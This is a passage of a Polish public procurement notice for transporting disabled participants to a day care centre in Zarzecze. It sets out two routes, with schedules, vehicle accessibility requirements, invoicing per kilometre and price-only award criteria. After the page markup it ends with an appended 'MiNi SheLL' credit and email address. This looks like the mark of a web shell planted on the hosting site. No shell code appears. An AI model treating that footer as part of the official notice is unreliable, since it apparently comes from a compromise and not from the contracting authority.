realizowany będzie w dni robocze, od poniedziałku do piątku z wyłączeniem świąt i dni ustawowo wolnych od pracy i obejmował będzie: Dowiezienie uczestników projektu do Dziennego Domu Pomocy (DDP) w Zarzeczu ul. Ks. Gajeckiego 2, 37-205 Zarzecze, na godzinę 8:00 z ich miejsca zamieszkania, tj. Boratyn (1 osoba), Radymno (1 osoba), Nienowice (1 osoba), Ryszkowa Wola (1 osoba), a następnie odwiezienie uczestników projektu z DDP w Zarzeczu do miejsca zamieszkania – wyjazd o godz. 14:00.Kurs każdorazowo będzie się rozpoczynał i kończył przy ul. Ks. Gajeckiego 2, 37-205 Zarzecze w celu zapewnienia udziału opiekuna w dowozie. Łącznie usługa świadczona będzie dla 5 osób (4 uczestników projektu oraz opiekun). Przewidywana dzienna długość trasy – 204 km.Planowana liczba dni dowozu – 523.Czas trwania przywozu i odwozu nie powinien przekroczyć odpowiednio 120 min.Pojazd powinien być przystosowany do przewożenia osób z niepełnosprawnościami, posiadać 1 miejsce do przewożenia osoby na wózku inwalidzkim. Zamawiający dopuszcza w sytuacjach wyjątkowych, niezależnych od przewoźnika, odstępstwa od przyjętego czasu dowozu w przypadku niekorzystnych warunków atmosferycznych, czasowej zmiany organizacji ruchu lub uzasadnionych sytuacji losowych. Wykonawca w porozumieniu z Zamawiającym ustali optymalną trasę przejazdu, mając na uwadze jak najkrótszy czas przebywania uczestnika w podróży.3.	W wyjątkowych sytuacjach dowóz może być realizowany w sobotę, w zamian za inny dzień roboczy.4.	Zamawiający zastrzega możliwość zmiany tras (+/- 20% łącznej długości tras) oraz zwiększenia liczby dowożonych osób ( o 1 osobę), co nie może stanowić podstawy do wnoszenia roszczeń przez Wykonawcę. Zmiana będzie każdorazowo uzgadniana z Wykonawcą.5.	Dowóz będzie odbywał się z udziałem odpowiednio przeszkolonego opiekuna. Opiekuna zapewni Zamawiający. 6.	Wykonawca jest zobowiązany do zapewnienia utrzymania pojazdów dowożących w należytym stanie technicznym, gwarantując sprawność pojazdów i bezpieczeństwo przewożonych osób. Usunięcie usterek oraz wszelkie doposażenie pojazdów Wykonawca zapewnia we własnym zakresie.7.	Od Wykonawcy wymaga się dostosowania liczby pojazdów do liczby osób uprawnionych do dowozu, z uwzględnieniem określonych wyżej zasad dotyczących wykonywania usługi dowozu.8.	Pojazdy muszą być utrzymane w czystości, z zachowaniem estetyki wewnętrznej i zewnętrznej, w okresie zimowym wyposażone w opony zimowe, muszą posiadać sprawne ogrzewanie i klimatyzację oraz pasy bezpieczeństwa dla wszystkich przewożonych osób. 9.	Pojazdy dowożące uczestników muszą być przystosowane do przewozu osób z niepełnosprawnościami, w tym osób poruszających się na wózku inwalidzkim (1 osoba), tj. wyposażone w windę hydrauliczną lub podjazd dla wózków inwalidzkich oraz specjalne, atestowane mocowania na wózki inwalidzkie, posiadać pasy stabilizujące pozycję osoby niepełnosprawnej, zgodnie z przepisami obowiązującymi w tym zakresie. Pojazdy powinny być oznakowane stosownie do charakteru świadczonych usług tj. transportu osób niepełnosprawnych.10. Koszt przystosowania pojazdu/pojazdów do przewozu osób na wózkach inwalidzkich ponosi Wykonawca.11.	Wszystkie dowożone osoby muszą mieć zapewnione miejsca siedzące, Zamawiający nie dopuszcza miejsc stojących w pojazdach.12.	Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usługi przewozu osób. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna spowodowana działalnością Wykonawcy. 13.	Wykonawca zobowiązuje się świadczyć usługi przewozowe przy zachowaniu przepisów Prawo o ruchu drogowym oraz przepisów dotyczących czasu pracy kierowców, a także zgodnie z ustaloną przez Zamawiającego procedurą dowozu do placówek PSONI Koło w Jarosławiu w związku ze stanem epidemii COVID -19.14.	Wykonawca musi posiadać uprawnienia niezbędne do realizowania co najmniej przewozów krajowych zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym oraz aktualne i ważne ubezpieczenie pojazdu (polisa OC, NNW). 15.	W przypadku czasowej niemożności świadczenia usług przewozowych, w uzasadnionych przypadkach, Wykonawca zobowiązuje się do niezwłocznego powiadomienia Zamawiającego i zorganizowania zastępczego wykonania usługi, jak najszybciej, jednak nie dłużej niż w ciągu 1,5 godziny, zapewniającego ciągłość dowozu oraz równorzędny poziom usług.16.	W przypadku zmiany trasy spowodowanej np. chorobą uczestnika, Wykonawca zostanie powiadomiony przez kierownika DDP najpóźniej rano w dniu dowozu, przed rozpoczęciem świadczenia usługi.17.	Zamawiający zastrzega możliwość czasowego zawieszenia świadczenia usługi lub jej części, jeżeli z przyczyn niezależnych od Zamawiającego (np. wpływ stanu zagrożenia epidemicznego lub epidemii), będzie on zmuszony do zawieszenia działalności placówki lub jej zamknięcia, co nie może stanowić podstawy do wnoszenia roszczeń przez Wykonawcę.18.	Wykonawca będzie dokonywał comiesięcznych rozliczeń z wykonanej usługi na podstawie faktur. Podstawę wystawienia faktury VAT, stanowić będzie wykaz przejechanych kilometrów, każdorazowo poświadczony po zakończeniu trasy dowozu przez opiekuna uczestniczącego w transporcie i przez kierowcę oraz zatwierdzony przez Zamawiającego. Należność na wystawionej fakturze VAT, stanowić będzie iloczyn przejechanych kilometrów oraz koszt jednostkowy za przejechanie 1 km wskazany w ofercie Wykonawcy. Płatność 21 dni od momentu dostarczenia faktury VAT Zamawiającemu. Wykonawca w cenie ofertowej, musi uwzględnić wszelkie koszty niezbędne do prawidłowego wykonania przedmiotu zamówienia.19.	Zamawiający stosownie do art. 29 ust. 3a ustawy Pzp wymaga zatrudnienia przez Wykonawcę, Podwykonawcę kierowców pojazdów na podstawie umowy o pracę (nie dotyczy osób fizycznych prowadzących działalność gospodarczą niezatrudniających pracowników lub niezawierających umów cywilnoprawnych, które będą samodzielnie realizować zamówienie publicznie).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>60130000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2022-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dowóz uczestników projektu do Dziennego Domu Pomocy w Zarzeczu - Trasa nr 2</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przedmiotem zamówienia jest świadczenie usługi transportowej w zakresie przewozu osób.2.	Transport realizowany będzie w dni robocze, od poniedziałku do piątku z wyłączeniem świąt i dni ustawowo wolnych od pracy i obejmował będzie: Dowiezienie uczestników projektu do Dziennego Domu Pomocy w Zarzeczu ul. Ks. Gajeckiego 2, 37-205 Zarzecze na godzinę 7:00 z ich miejsca zamieszkania, tj. Przeworska (2 osoby), a następnie odwiezienie uczestników projektu do miejsca zamieszkania od godz. 14:00 (Kurs 1). Po przywiezieniu uczestników z Przeworska do Zarzecza, rozpoczęcie kolejnego kursu i przywiezienie kolejnych uczestników na godzinę 8.00 z ich miejsca zamieszkania tj. Kruchel Pełkiński (1 osoba), Jarosław (2 osoby), a następnie odwiezienie uczestników projektu z DDP w Zarzeczu do miejsca zamieszkania od godz. 15:00 (Kurs 2).Kurs każdorazowo będzie się rozpoczynał i kończył przy przy ul. Ks. Gajeckiego 2, 37-205 Zarzecze w celu zapewnienia udziału opiekuna w dowozie. Łącznie usługa świadczona będzie dla 6 osób w tym:•	3 osób (2 uczestników projektu oraz opiekun) – Kurs 1•	4 osób (3 uczestników projektu oraz opiekun) – Kurs 2Przewidywana dzienna długość trasy – 110 km.Planowana liczba dni dowozu – 523.Czas trwania przywozu i odwozu nie powinien przekroczyć odpowiednio 40 min. (Kurs 1) i 60 min. (Kurs 2).Pojazd powinien być przystosowany do przewożenia osób z niepełnosprawnościami, posiadać 2 miejsce do przewożenia osoby na wózku inwalidzkim. Zamawiający dopuszcza w sytuacjach wyjątkowych, niezależnych od przewoźnika odstępstwa od przyjętego czasu dowozu w przypadku niekorzystnych warunków atmosferycznych, czasowej zmiany organizacji ruchu lub uzasadnionych sytuacji losowych. Wykonawca w porozumieniu z Zamawiającym ustali optymalną trasę przejazdu, mając na uwadze jak najkrótszy czas przebywania uczestnika w podróży.3.	W wyjątkowych sytuacjach dowóz może być realizowany w sobotę, w zamian za inny dzień roboczy.4.	Zamawiający zastrzega możliwość zmiany tras (+/- 20% łącznej długości tras) oraz zwiększenia liczby dowożonych osób ( o 1 osobę), co nie może stanowić podstawy do wnoszenia roszczeń przez Wykonawcę. Zmiana będzie każdorazowo uzgadniana z Wykonawcą.5.	Dowóz będzie odbywał się z udziałem odpowiednio przeszkolonego opiekuna. Opiekuna zapewni Zamawiający. 6.	Wykonawca jest zobowiązany do zapewnienia utrzymania pojazdów dowożących w należytym stanie technicznym, gwarantując sprawność pojazdów i bezpieczeństwo przewożonych osób. Usunięcie usterek oraz wszelkie doposażenie pojazdów Wykonawca zapewnia we własnym zakresie.7.	Od Wykonawcy wymaga się dostosowania liczby pojazdów do liczby osób uprawnionych do dowozu, z uwzględnieniem określonych wyżej zasad dotyczących wykonywania usługi dowozu.8.	Pojazdy muszą być utrzymane w czystości, z zachowaniem estetyki wewnętrznej i zewnętrznej, w okresie zimowym wyposażone w opony zimowe, muszą posiadać sprawne ogrzewanie i klimatyzację oraz pasy bezpieczeństwa dla wszystkich przewożonych osób. 9.	Pojazdy dowożące uczestników muszą być przystosowane do przewozu osób z niepełnosprawnościami, w tym osób poruszających się na wózku inwalidzkim (2 osoby), tj. wyposażone w windę hydrauliczną lub podjazd dla wózków inwalidzkich oraz specjalne, atestowane mocowania na wózki inwalidzkie, posiadać pasy stabilizujące pozycję osoby niepełnosprawnej, zgodnie z przepisami obowiązującymi w tym zakresie. Pojazdy powinny być oznakowane stosownie do charakteru świadczonych usług tj. transportu osób niepełnosprawnych.10. Koszt przystosowania pojazdu/pojazdów do przewozu osób na wózkach inwalidzkich ponosi Wykonawca.11.	Wszystkie dowożone osoby muszą mieć zapewnione miejsca siedzące, Zamawiający nie dopuszcza miejsc stojących w pojazdach.12.	Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usługi przewozu osób. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna spowodowana działalnością Wykonawcy. 13.	Wykonawca zobowiązuje się świadczyć usługi przewozowe przy zachowaniu przepisów Prawo o ruchu drogowym oraz przepisów dotyczących czasu pracy kierowców, a także zgodnie z ustaloną przez Zamawiającego procedurą dowozu do placówek PSONI Koło w Jarosławiu w związku ze stanem epidemii COVID -19.14.	Wykonawca musi posiadać uprawnienia niezbędne do realizowania co najmniej przewozów krajowych zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym oraz aktualne i ważne ubezpieczenie pojazdu (polisa OC, NNW). 15.	W przypadku czasowej niemożności świadczenia usług przewozowych, w uzasadnionych przypadkach, Wykonawca zobowiązuje się do niezwłocznego powiadomienia Zamawiającego i zorganizowania zastępczego wykonania usługi, jak najszybciej, jednak nie dłużej niż w ciągu 1,5 godziny, zapewniającego ciągłość dowozu oraz równorzędny poziom usług.16.	W przypadku zmiany trasy spowodowanej np. chorobą uczestnika, Wykonawca zostanie powiadomiony przez kierownika DDP najpóźniej rano w dniu dowozu, przed rozpoczęciem świadczenia usługi.17.	Zamawiający zastrzega możliwość czasowego zawieszenia świadczenia usługi lub jej części, jeżeli z przyczyn niezależnych od Zamawiającego (np. wpływ stanu zagrożenia epidemicznego lub epidemii), będzie on zmuszony do zawieszenia działalności placówki lub jej zamknięcia, co nie może stanowić podstawy do wnoszenia roszczeń przez Wykonawcę.18.	Wykonawca będzie dokonywał comiesięcznych rozliczeń z wykonanej usługi na podstawie faktur. Podstawę wystawienia faktury VAT, stanowić będzie wykaz przejechanych kilometrów, każdorazowo poświadczony po zakończeniu trasy dowozu przez opiekuna uczestniczącego w transporcie i przez kierowcę oraz zatwierdzony przez Zamawiającego. Należność na wystawionej fakturze VAT, stanowić będzie iloczyn przejechanych kilometrów oraz koszt jednostkowy za przejechanie 1 km wskazany w ofercie Wykonawcy. Płatność 21 dni od momentu dostarczenia faktury VAT Zamawiającemu. Wykonawca w cenie ofertowej, musi uwzględnić wszelkie koszty niezbędne do prawidłowego wykonania przedmiotu zamówienia.19.	Zamawiający stosownie do art. 29 ust. 3a ustawy Pzp wymaga zatrudnienia przez Wykonawcę, Podwykonawcę kierowców pojazdów na podstawie umowy o pracę (nie dotyczy osób fizycznych prowadzących działalność gospodarczą niezatrudniających pracowników lub niezawierających umów cywilnoprawnych, które będą samodzielnie realizować zamówienie publicznie).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>60130000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2022-11-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com